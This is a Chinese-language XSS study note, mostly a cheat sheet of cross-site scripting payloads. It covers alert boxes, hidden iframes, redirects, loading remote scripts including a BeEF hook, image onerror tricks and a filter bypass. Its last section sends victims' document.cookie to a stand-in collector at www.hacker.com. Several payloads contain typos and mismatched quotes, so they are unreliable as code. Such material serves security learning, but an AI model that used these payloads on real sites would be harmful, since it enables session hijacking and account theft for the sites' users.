SXX 学习笔记
构造XSS脚本
1、常用的html标签:
| <iframe> | iframe 元素会创建包含另外一个文档的内联框架 |
| <textarea> | 标签定义多行的文本输入控件 |
| <img> | 向网页中嵌入一副图像 |
| <script> | 用于定义客户端脚本 |
2、常用的JavaScript方法
| alert | 用于显示带有一条指定消息和一个确认按钮的警告框 |
| window.location | 用于获得当前页面的URL,并把浏览器重定向到新的页面 |
| location.href | 返回当前显示的文档的完整url |
| onload | 一张页面或一张图片完成加载 |
| onsubmit | 确认按钮被点击 |
| onerror | 加载文档或图片发生错误 |
3、构造XSS脚本
- 弹出警告框
<script>alert('xcc')</script> <script>alert(document.cookie)</script> - 页面嵌套
<iframe src=http://www.baidu.com width=300 height=300></iframe> <iframe src=http://www.baidu.com width=0 height=0 border=0></iframe>
- 页面重定向
<script>windows.location="http://www.qfedu.com"</script> <script>location.href="http://www.qfedu.com"</script>
- 弹出警告并重定向
<script>alert("请移步");location.href="http://www.qfedu.com"</script> <script>alert("xss");location.href="http://10.1.64.22/mutillidae/robots.txe"</script> - 访问恶意代码
<script src="http://www.qfedu.com/xss.js"></script> <script src="http://BeEF_IP:3000/hook.js"></script>
- 巧用图片标签
<img src="#" onerror=alert('xss')> <img src="javascript:alert('xss');"> <img src="http://BeEF_IP:3000/hook.js"></img> - 绕开过滤的脚本
<a href="javascript:alert("xss")">yang</a>
- 收集用户cookie
<script>window.open("http://www.hacker.com/cookie.php?cookie="+document.cookie)</script> <script>document.location="http://www.hacker.com/cookie.php?cookie="+document.cookie</script> <script>new Image().src-"http://www.hacker.com/cookie.php?cookie="+document.cookie</script> <img src='''http://www.hacker.com/cookie.php?cookie='+document.cookie"></img> <iframe scr="http://www.hacker.com/cookie.php?cookie='document.cookie"></iframe> <script>new Image().src="http://www.hacker.com/cookie.php?cookie='+document.cookie"; img.width=0; img.height=0; </script>
可以通过beef收集
浙公网安备 33010602011771号